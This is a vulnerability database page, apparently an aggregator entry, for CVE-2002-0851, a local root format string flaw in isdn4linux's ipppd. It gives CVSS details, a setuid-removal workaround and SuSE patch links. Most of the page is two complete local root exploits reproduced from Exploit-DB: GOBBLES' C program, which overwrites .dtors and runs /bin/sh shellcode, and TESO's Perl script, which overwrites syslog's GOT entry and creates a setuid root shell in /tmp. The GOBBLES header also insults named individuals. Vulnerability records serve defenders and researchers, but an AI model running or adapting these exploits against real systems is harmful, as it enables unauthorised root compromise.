CVE-2002-0851
CVSS 7.2
Published: 2002-09-05 00:00:00
Last revised: 2008-09-05 16:29:07

[Original] Format string vulnerability in ISDN Point to Point Protocol (PPP) daemon (ipppd) in the ISDN4Linux (i4l) package allows local users to gain root privileges via format strings in the device name command line argument, which is not properly handled in a call to syslog.


[CNNVD] ISDN4Linux ipppd device name local format string vulnerability (CNNVD-200209-010)

        
isdn4linux is a free, open-source ISDN implementation for Linux; it bundles several programs for maintaining ISDN links and establishing connections.
The ipppd program in isdn4linux does not check an argument it passes to the syslog() function. A local attacker can use this to mount a format string attack and gain root privileges.
ipppd is installed setuid root by default and may only be executed by members of the 'dialout' group. Because an invalid, user-supplied device name is passed to syslog() as the format string rather than as an argument, a local attacker can supply malicious format directives in that argument and overwrite arbitrary memory in the ipppd process; carefully constructed input yields arbitrary command execution as root.
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [system can be rendered completely unavailable]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required]

- CPE (affected platforms and products)

Product and version information (CPE) not available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0851
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0851
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200209-010
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/5437
(VENDOR_ADVISORY)  BID  5437
http://www.iss.net/security_center/static/9811.php
(VENDOR_ADVISORY)  XF  isdn4linux-ipppd-format-string(9811)
http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0068.html
(VENDOR_ADVISORY)  VULNWATCH  20020809 Local Root Exploit

- Vulnerability information

ISDN4Linux ipppd device name local format string vulnerability
High  Unknown
2002-09-05 00:00:00 2005-05-02 00:00:00
Local

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Remove the setuid root bit from ipppd (non-root members of dialout will then no longer be able to start ipppd themselves):
  # chmod u-s /usr/sbin/ipppd
* Allow only trusted users in the dialout group.
Vendor patches:
S.u.S.E.
--------
S.u.S.E. has released a security advisory (SuSE-SA:2002:030) and corresponding patches:
SuSE-SA:2002:030:i4l
Link:
http://www.suse.com/de/support/security/2002_030_i4l.html

Patch downloads:
i386 Intel Platform:
SuSE-8.0
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/i4l-2002.7.31-0.i386.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/i4l-2002.7.31-0.src.rpm
SuSE-7.3
ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/i4l-2002.7.23-0.i386.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/i4l-2002.7.23-0.src.rpm
Sparc Platform:
SuSE-7.3
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n1/i4l-2002.7.23-0.sparc.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/i4l-2002.7.23-0.src.rpm
PPC Power PC Platform:
SuSE-7.3
ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n1/i4l-2002.7.23-0.ppc.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/i4l-2002.7.23-0.src.rpm
Patch installation:
Install the files with "rpm -Fhv file.rpm".

- Vulnerability information (21700)

ISDN4Linux 3.1 IPPPD Device String SysLog Format String Vulnerability (1) (EDBID:21700)
linux local
2002-08-10 Verified
0 Gobbles Security
N/A
source: http://www.securityfocus.com/bid/5437/info

isdn4linux is a freely available, open source package of isdn compatibility tools. It is available for Linux operating systems.

isdn4linux contains a format string vulnerability in the ipppd utility. In some installations, this utility is installed with setuid root privileges. Exploitation of this vulnerability could lead to a local attacker executing code with administrative privileges.

/*
 * GOBBLES-own-ipppd.c -- local root on SuSE 8.0
 *
 * Random Defcon Quote:
 *  "Who hired Gary Coleman to play KF at defcon?"
 *   -Anonymous
 *
 * ipppd is part of the isdn4linux-utils package and
 * is part of the default install of many linux dists.
 *
 * It is installed suid root on suse 8.0 but can only
 * be run by users in group "dialout". Luckily this
 * is a default group that normal users get added to.
 *
 * Problem:
 *
 * Classical syslog(3) formatstring problem.
 *
 * ipppd will log device strings in the following manner:
 *
 * main.c:
 *
 * ...
 * syslog(LOG_NOTICE,devstr);  // HARD TO SPOT BUG
 * ...
 *
 * This code is normally only reached with a valid device string
 * but if you feed ipppd a devicename that is >= 256 bytes it
 * will merrily proceed to log this string using the faulty
 * syslog(3) call. Subsequently handing over root access to the machine.
 *
 *     GENERIC FORMATSTRING EXPLOITS ARE SUPER DUPER FUN
 *
 * We're surprised that format bugs are allowed in 7350linux, but no one
 * is perfect.  Finding format bugs is a difficult task, and should be left
 * to the professionals.  A little known fact -- Paul Vixie invented
 * insecure programming.  We wanted to get this bug squashed before some
 * "researcher" from snosoft.com discovered it and tried to make some money
 * off it.  Help us in our mission to eliminate the existence of format bugs
 * in code.
 *
 * Greets:
 *  -Mark Litchfield, for helping make defcon happen.  Thanks.
 *  -Blue Boar, for his brilliant input during the Defcon Ethics Roundtable
 *   Challenge (the finest moment of defcon X)
 *  -Dean Turner, who contrary to whatever might be said, GOBBLES is not
 *   afraid of.  http://www.infonexus.com/PIX/08.01.02--defcon10/46.jpg
 *  -Eric Hines of f8labs.com, congratulations on your promotion to stockboy
 *   at Circuit City.
 *  -dice, for continuing to support the blackhat world (thanks for buying
 *   a turkey breakfast)
 *  -stealth, for making fun of the super bug.
 *  -Brian McWilliams, for thinking he knows what's up.  Hoser.
 *
 * Be careful using the Compaq TestDrive Servers -- researchers from SnoSoft
 * have compromised each and every one of those machines, and are rapidly
 * stealing other warez developed on these machines.  If you have also
 * worked with your perl -e techniques on these machines, and discovered some
 * locally exploitable stack overflows, your work may have been ripped off.
 * KF, the defcon stage, much like information security, is not for you.
 *
 * Please, help liberate dvdman!  Let him go back to maintaining
 * l33tsecurity.com, and stop raping his mind for less-than-minimum wage;
 * skill displayed on l33tsecurity.com shows this man knows what's up and
 * deserves to make a little more money, or return to the wild where he
 * can hack freely.  FREE DVDMAN!@#!@#
 *
 * (flashn has asked that the "hack.se is a bunch of nazis" statement from
 *  the defcon speech to be publically retracted and for an apology to be
 *  issued)
 *
 */
/*
 * PROOF OF CONCEPT ON DEFAULT SuSE 8.0 INSTALL:
 *
 * $ ./GOBBLES-own-ipppd -t 0x806c864
 * [*] target @ 0x806c868
 * [*] shellcode @ 0xbfffffb5
 * sh-2.05# id
 * uid=0(root) gid=100(users) groups=100(users)
 * sh-2.05#
 *
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define DPA             11
#define ALLIGN          3

#define IPPPD           "/usr/sbin/ipppd"
#define OBJDUMP         "/usr/bin/objdump"

void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);

extern char **environ;
char string[260];

int
main(int argc, char **argv)
{
        int dpa, aln, shift = 0;
        char opt, *tmp;
        unsigned long t, w;

        if(argc == 1) {
                fprintf(stderr, "\nUsage: \n%s -t <.dtors address>\n\n"
                                "Optional:\n\t-o <word offset>\n\t-a <allignment>\n\n"
                                "For the lazy:\n\t-g spits out .dtors section (use standalone)\n\n"
                                , argv[0]);
                exit(0);
        }

        aln = ALLIGN;
        dpa = DPA;

        while((opt = getopt(argc, argv, "t:o:a:g")) != EOF) {
                switch(opt) {
                        case 't':
                                sscanf(optarg, "%p", &tmp);
                                t = (long)tmp;
                                t += 4;
                                break;
                        case 'a':
                                aln = atoi(optarg);
                                break;
                        case 'o':
                                dpa = atoi(optarg);
                                break;
                        case 'g':
                                fprintf(stderr, "[*] requested objdump, this will halt any exploitation\n");
                                if(execl(OBJDUMP, "objdump", "-s", "-j", ".dtors", IPPPD, NULL)) {
                                        fprintf(stderr, "[*] error getting .dtors section, check paths\n");
                                        exit(1);
                                }
                        default:
                                fprintf(stderr, "hehehe ;PppPPPpP\n");
                                exit(0);
                }
        }

        tmp = NULL;

        if((tmp = getenv("GOBBLES")) == NULL) {
                stuff();
                if(execve(argv[0], argv, environ)) {
                        fprintf(stderr, "[*] error re-executing\n");
                        exit(1);
                }
        }

        w = (long)tmp;
        shift = (strlen(argv[0]) - strlen(IPPPD));
        w += shift;

        fprintf(stderr, "[*] target @ %p\n[*] shellcode @ %p\n", t, w);

        buildstring(t, w, dpa, aln);

        if(execl(IPPPD, "ipppd", string, NULL)) {
                fprintf(stderr, "[*] error executing\n");
                exit(1);
        }
}


void
buildstring(unsigned long t, unsigned long w, int dpa, int aln)
{
        char a_buf[4];
        unsigned int un, deux, x, len, b[4];

        memset(string, '\0', sizeof(string));
        memset(a_buf, '\0', sizeof(a_buf));

        for(x = 0; x < aln && x < sizeof(a_buf); x++)
                a_buf[x] = 'x';

        b[0] = (t & 0x000000ff);
        b[1] = (t & 0x0000ff00) >> 8;
        b[2] = (t & 0x00ff0000) >> 16;
        b[3] = (t & 0xff000000) >> 24;

        un = (w >> 16) & 0xffff;
        deux = w & 0xffff;

        if(un < deux) {
                snprintf(string, sizeof(string)-1,
                        "%s"
                        "%c%c%c%c%c%c%c%c"
                        "%%.%hdx" "%%%d$hn"
                        "%%.%hdx" "%%%d$hn",
                        a_buf,
                        b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],
                        un - (8 + aln + 5), dpa,
                        deux - un, dpa + 1
                );
        }
        else {
                snprintf(string, sizeof(string)-1,
                        "%s"
                        "%c%c%c%c%c%c%c%c"
                        "%%.%hdx" "%%%d$hn"
                        "%%.%hdx" "%%%d$hn",
                        a_buf,
                        b[0], b[1], b[2], b[3], b[0]+2, b[1], b[2], b[3],
                        deux - (8 + aln + 5), dpa,
                        un - deux, dpa + 1
                );
        }

        len = strlen(string);
        memset(&string[len], 'x', (sizeof(string)-len-1));
}


void
stuff(void)
{
        char code[] = // the setuid 0 with the execve of the /bin/sh
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
        "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
        "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";  // In honor of Snosoft
                                                 // appreciate week, we
                                                 // too are using only
                                                 // Taeho Oh shellcode.
        setenv("GOBBLES", code, 1);
}

- Vulnerability information (21701)

ISDN4Linux 3.1 IPPPD Device String SysLog Format String Vulnerability (2) (EDBID:21701)
linux local
2002-08-10 Verified
0 TESO Security
N/A
source: http://www.securityfocus.com/bid/5437/info
 

#!/usr/bin/perl

# 7350pippi - x86/Linux ipppd local root
#
# (C) COPYRIGHT TESO Security, 2002
# All Rights Reserved
#
# May be used under the terms of the GPL.

# ipppd local root exploit:
# ... 
#    /*
#     * Check if there is a device by this name.
#     */
#    if (stat(cp, &statbuf) < 0) {
#        if (errno == ENOENT)
#            return 0;
#        syslog(LOG_ERR, cp);
#        return -1;
#    }
# ...
# 
# This exploit changes the address of syslog in ipppd's
# GOT. Since it returns -1 as seen above, ipppd will invoke
# syslog() a second time soon this time using the address
# given by us. We redirect the GOT entry to a stacklocation
# where the filename of the executed program is normally
# located. Since we symlink() the shellcode to /usr/sbin/ipppd
# the shellcode goes on the stack AT A FIXED ADDRESS! Thus
# we avoid ugly offsets and guessing/bruteforce.
# If porting this exploits to other systems, you
# need to find syslogs() GOT entry yourself.
#

use Fcntl;

# chown()+chmod() /tmp/boomsh
$shellcode = "\x90"x100 .
"\x31\xc0\xb0\x46\xbb\xff\xff\xff\xff\x31\xc9\xcd\x80\xeb".
"\x2a\x90\x90\x90\x90\x5e\x89\xf3\xff\x03\xff\x43\x04\x31".
"\xc0\x88\x43\x0b\x31\xc0\xb0\xb6\x31\xc9\x31\xd2\xcd\x80".
"\x31\xc0\xb0\x0f\x66\xb9\xed\x0d\xcd\x80\x31\xc0\x40\xcd".
"\x80\xe8\xd5\xff\xff\xff\x2e\x74\x6d\x70\x2e\x62\x6f\x6f".
"\x6d\x73\x68\x2e";

unlink("/tmp/$shellcode");
symlink("/usr/sbin/ipppd", "/tmp/$shellcode") or die "$!";

# my syslog GOT entry @ 0x806c90c

sysopen(O, "/tmp/boomsh.c", O_RDWR|O_CREAT, 0600) or die "$!";
print O<<_EOF_;
#include <stdio.h>
int main()
{
        char *a[] = {"/bin/bash", "--norc", "--noprofile", NULL};

        setuid(0);
        execve(*a, a, NULL);
        return -1;
}
_EOF_
close O;

print "Compiling boomshell ...\n";
system("cc /tmp/boomsh.c -o /tmp/boomsh");

$dir = "/tmp/L";
mkdir($dir);

$ret = 0xbffffffb - length($shellcode)+20;
printf("Filename is located @ %x\n", $ret);


# maybe need to change to your GOT entry
# of syslog(); see above
$file = "XX" . 	pack(c4, 0x0c, 0xc9, 0x06, 0x08) . "1234" . # GOT
		pack(c4, 0x0d, 0xc9, 0x06, 0x08) . "1234" . # GOT+1
		pack(c4, 0x0e, 0xc9, 0x06, 0x08) . "1234" . # GOT+2
		pack(c4, 0x0f, 0xc9, 0x06, 0x08); 	    # GOT+3
		
$stackpop = "%p"x11;
$file .= $stackpop;

#$file .= "%14d%n%69d%n%40d%n%192d%n";

# Should be fixed. If not, find the 4 values for
# %d yourself using gdb. This worked for me.
$file .= "%221d%n%158d%n%256d%n%192d%n";

open(O, ">$dir/$file") or die "$!";
close O;

system("/tmp/$shellcode", "..$dir/$file/");

exec("/tmp/boomsh");

		

- Vulnerability information

5067
ISDN4Linux ipppd Local Format String Privilege Escalation
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2002-08-10 Unknown
2002-08-10 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see the site's About page.

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's web sites.